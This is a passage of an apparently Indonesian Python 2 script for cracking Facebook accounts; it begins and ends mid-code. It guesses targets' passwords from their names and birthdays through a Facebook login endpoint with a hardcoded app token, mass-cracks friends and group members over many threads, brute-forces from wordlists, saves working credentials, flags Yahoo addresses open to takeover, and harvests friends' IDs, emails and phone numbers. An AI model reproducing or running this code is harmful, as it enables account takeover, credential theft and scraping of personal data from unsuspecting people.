print '\x1b[1;91m[!] Jangan kosong'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mTidak ada'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Akun target harus berteman dengan akun anda dulu !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mMemeriksa \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[+] \x1b[1;92mMembuka keamanan \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Maaf, gagal membuka password target :('
print '\x1b[1;91m[!] Cobalah dengan cara lain.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Koneksi terganggu'
time.sleep(1)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
def hasil():
print
print 40 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Gagal \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Crack dari daftar Teman'
print '\x1b[1;37;40m2. Crack dari member Grup'
print '\x1b[1;31;40m0. Kembali'
print
pilih_super()
def pilih_super():
peak = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Jangan kosong'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mJumlah ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
print
print 40 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass1
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass1
else:
pass2 = b['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass2
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass2
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass3
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass3
else:
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass4
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass4
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mJumlah\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mMencoba \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Koneksi Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mIngin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Tolong pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Tolong pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Dari teman facebook'
print '\x1b[1;37;40m2. Gunakan File'
print '\x1b[1;31;40m0. Kembali'
print
yahoo_pilih()
def yahoo_pilih():
go = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Jangan kosong'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak ada'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(teman.text)
save = open('MailVuln.txt', 'w')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 40 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File tidak ada'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Ambil ID teman'
print '\x1b[1;37;40m2. Ambil ID teman dari teman'
print '\x1b[1;37;40m3. Ambil ID member GRUP'
print '\x1b[1;37;40m4. Ambil Email teman'
print '\x1b[1;37;40m5. Ambil Email teman dari teman'
print '\x1b[1;37;40m6. Ambil No HP teman'
print '\x1b[1;37;40m7. Ambil No HP teman dari teman'
print '\x1b[1;31;40m0. Kembali'
print
grab_pilih()
def grab_pilih():
cuih = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Jangan kosong'
grab_pilih()
else:
if cuih == '1':
id_teman()
else:
if cuih == '2':
idfrom_teman()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_teman()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_teman()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mTidak ada'
grab_pilih()
def id_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idteman.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def idfrom_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
